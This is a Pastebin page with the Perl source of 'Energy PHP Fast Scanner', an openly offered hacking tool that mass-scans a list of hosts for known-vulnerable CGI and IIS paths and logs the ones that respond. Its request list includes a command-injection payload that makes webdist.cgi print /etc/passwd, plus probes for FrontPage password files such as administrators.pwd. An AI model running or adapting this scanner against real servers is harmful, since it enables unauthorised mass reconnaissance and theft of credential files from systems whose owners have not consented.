Advertisement
FlyFar

HackTool. Perl. Energy. a - Source Code

Mar 10th, 2023
1,407
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Perl 6.33 KB | Cybersecurity | 0 0
  1.  
  2.  
  3. @scripts_w = ("GET /cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd HTTP/1.0\n\n",
  4. "GET /_vti_bin/shtml.dll HTTP/1.0\n\n",
  5. "GET /article.php HTTP/1.0\n\n",
  6. "GET /_vti_bin/shtml.exe HTTP/1.0\n\n",
  7. "GET /msadc/samples/adctest.asp HTTP/1.0\n\n");
  8.  
  9. @names_w = ("/cgi-bin",
  10. "/_vti_bin",
  11. "/article",
  12. "/_vti_bin",
  13. "/Webdist",
  14. "/msadc.pl",
  15. "/RDS");
  16.  
  17.  
  18. ######### Fast Scan - script must be edited in sub version if it is to be used ##########
  19. @scripts_u = ("GET /_vti_inf.html HTTP/1.0\n\n","GET /_vti_pvt/service.pwd HTTP/1.0\n\n",
  20. "GET /_vti_pvt/users.pwd HTTP/1.0\n\n","GET /_vti_pvt/authors.pwd HTTP/1.0\n\n",
  21. "GET /_vti_pvt/administrators.pwd HTTP/1.0\n\n","GET /_vti_bin/shtml.dll HTTP/1.0\n\n",
  22. "GET /_vti_bin/shtml.exe HTTP/1.0\n\n","GET /cgi-dos/args.bat HTTP/1.0\n\n",
  23. "GET /cgi-win/uploader.exe HTTP/1.0\n\n","GET /cgi-bin/rguest.exe HTTP/1.0\n\n",
  24. "GET /cgi-bin/wguest.exe HTTP/1.0\n\n","GET /scripts/issadmin/bdir.htr HTTP/1.0\n\n",
  25. "GET /scripts/CGImail.exe HTTP/1.0\n\n","GET /scripts/tools/newdsn.exe HTTP/1.0\n\n",
  26. "GET /scripts/fpcount.exe HTTP/1.0\n\n","GET /cfdocs/expelval/openfile.cfm HTTP/1.0\n\n",
  27. "GET /cfdocs/expelval/exprcalc.cfm HTTP/1.0\n\n","GET /cfdocs/expelval/displayopenedfile.cfm HTTP/1.0\n\n",
  28. "GET /cfdocs/expelval/sendmail.cfm HTTP/1.0\n\n","GET /iissamples/exair/howitworks/codebrws.asp HTTP/1.0\n\n",
  29. "GET /iissamples/sdk/asp/docs/codebrws.asp HTTP/1.0\n\n","GET /msads/Samples/SELECTOR/showcode.asp HTTP/1.0\n\n",
  30. "GET /search97.vts HTTP/1.0\n\n","GET /carbo.dll HTTP/1.0\n\n");
  31. @names_u = ("_vti_inf.html   ","service.pwd     ","users.pwd       ","authors.pwd     ","administrators  ",
  32. "shtml.dll       ","shtml.exe       ","args.bat        ","uploader.exe    ","rguest.exe      ",
  33. "wguest.exe      ","bdir - samples  ","CGImail.exe     ","newdsn.exe      ","fpcount.exe     ",
  34. "openfile.cfm    ","exprcalc.cfm    ","dispopenedfile  ","sendmail.cfm    ","codebrws.asp    ",
  35. "codebrws.asp 2  ","showcode.asp    ","search97.vts    ","carbo.dll       ");
  36. ############################# Above code not used ###########################################
  37.  
  38.  
  39. ###############################################################
  40.  $insecure = 0;
  41. system "clear";
  42. print "\n                Energy PHP Fast Scanner \n\n";
  43. use IO::Socket;
  44. my ($port, $sock,$server);
  45. $size=0;
  46. ################################ SCAN ##########################
  47. if(! $ARGV[0])
  48. {
  49.  &usage;
  50.  exit;
  51. }
  52.  
  53. $port = $ARGV[2];
  54. if(! $ARGV[2]) { $port = 80; }
  55.  
  56. open (HOSTFILE, "$ARGV[0]");
  57. @hostfile = <HOSTFILE>;
  58. chop(@hostfile);
  59. $hostlength = @hostfile;
  60. $hostcount = 0;
  61.  
  62. while ($hostcount < $hostlength) {
  63.         print ("working on @hostfile[$hostcount]...\n");
  64. $server = (@hostfile[$hostcount]);
  65.         &connect;
  66.         $hostcount++;
  67.          }
  68.  
  69.  
  70. print "Scanner dropper \n";
  71.  
  72. ##########################################################
  73. sub connect {
  74.         #print "[Trying $server]\n";
  75.     $sock = IO::Socket::INET->new(PeerAddr => $server,
  76.                     PeerPort => $port,
  77.                     Proto => 'tcp');
  78.     if ($sock)  {
  79.         print "[Connected to $server on $port]\n";
  80.             $n=0;
  81.             &version;
  82.         close(sock);
  83.           $size++;
  84.       } else {
  85.    
  86.     }
  87. }
  88.  
  89. ###########################################################
  90. sub version {
  91.  $ver = "HEAD / HTTP/1.0\n\n";
  92.   my($iaddr,$paddr,$proto);
  93. $iaddr = inet_aton($server) || die "Error: $!";
  94. $paddr = sockaddr_in($port, $iaddr) || die "Error: $!";
  95. $proto = getprotobyname('tcp') || die "Error: $!";
  96. socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die "Error: $!";
  97. connect(SOCK, $paddr) || die "Error: $!";
  98. send(SOCK, $ver, 0) || die "Can't to send packet: $!";
  99.  
  100. # I do believe this should be taken out-------------------------
  101. # However unhash below to activate interactive optional deep mode.
  102.  
  103. # print "[Server version is]:\n[##############################]\n";
  104. # while(<SOCK>)
  105. # {
  106. # print;
  107. # }
  108. # print "[##############################]\n";
  109. #  print "Would you like normal or deep scan?\n [Normal-1, Deep-2, or Quit-3]:";
  110. # $n=0;
  111. # chomp($type=<STDIN>);
  112.  
  113. # Note if above is unhashed these two lines must be hashed.
  114. $n=0;
  115. $type=1;
  116.  
  117.  
  118. if($type eq 3)
  119.  { print "Scan aborted!\n"; exit; }
  120.  if($type eq 1)
  121.   {
  122.   foreach $scripts_w(@scripts_w)
  123. {
  124.     print "Searching for @names_w[$n] : ";
  125.     $scw=$scripts_w;
  126.       $name = @names_w[$n];
  127.     &win_scan;
  128.     $n++;
  129. }  
  130.   }
  131.  else {
  132.  
  133.  
  134. foreach $scripts_u(@scripts_u)
  135. {
  136.     print "Searching for [@names_u[$n]] : ";
  137.     $sc=$scripts_u;
  138.       $name = @names_u[$n];
  139.     &win2_scan;
  140.     $n++;
  141. }
  142.   }
  143. close(SOCK);
  144. }
  145. #################################################################
  146. sub win_scan {
  147. my($iaddr,$paddr,$proto);
  148. $iaddr = inet_aton($server) || die "Error: $!";
  149. $paddr = sockaddr_in($port, $iaddr) || die "Error: $!";
  150. $proto = getprotobyname('tcp') || die "Error: $!";
  151. socket(SOCK, PF_INET, SOCK_STREAM, $proto) || &error("Failed to open socket: $!");
  152. connect(SOCK, $paddr) || &error("Unable to connect: $!");
  153. send(SOCK,$scw,0);
  154.  
  155.     $check=<SOCK>;
  156.     ($http,$code,$blah) = split(/ /,$check);
  157.     if($code == 200)
  158.     {
  159.        
  160.                 print "[Found!]\n";
  161.         open (OUT, ">>$ARGV[1]");
  162.                 print OUT ("$server - [@names_w[$n]] \n");
  163.                 close (OUT);
  164.                 $insecure++;
  165.     }
  166.     else
  167.     {
  168.         print "[Not Found]\n";
  169.  
  170.     }
  171.     close(SOCK);
  172. }
  173.  
  174. ###############################################################
  175. sub win2_scan {
  176.  
  177.  my($iaddr,$paddr,$proto);
  178. $iaddr = inet_aton($server) || die "Error: $!";
  179. $paddr = sockaddr_in($port, $iaddr) || die "Error: $!";
  180. $proto = getprotobyname('tcp') || die "Error: $!";
  181. socket(SOCK, PF_INET, SOCK_STREAM, $proto) || &error("Failed to open socket: $!");
  182. connect(SOCK, $paddr) || &error("Unable to connect: $!");
  183. send(SOCK,$sc,0);
  184.  
  185.     $check=<SOCK>;
  186.     ($http,$code,$blah) = split(/ /,$check);
  187.     if($code == 200)
  188.     {
  189.         print "[Found!]\n";
  190.         $insecure++;
  191.     }
  192.     else
  193.     {
  194.         print "[Not Found]\n";
  195.  
  196.     }
  197.     close(SOCK);
  198. }
  199.  
  200. ################################ USAGE ##########################
  201. sub usage {
  202.         system "clear";
  203.         print "\n\n\n          Fast Scanner   \n\n";
  204.        print "                   || by Energy ||  \n\n";
  205.         print "Used to mass scan Windows,IRIX and Linux b0x\n\n";
  206.     print "Usage: perl usdl.pl hostlist.txt logfile.txt [porta]\n\n";
  207.     exit(0); }
  208. ################################ END   ##########################
  209. print "[Test $size hosts $port e $insecure sites vulnerable]\n";
  210.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement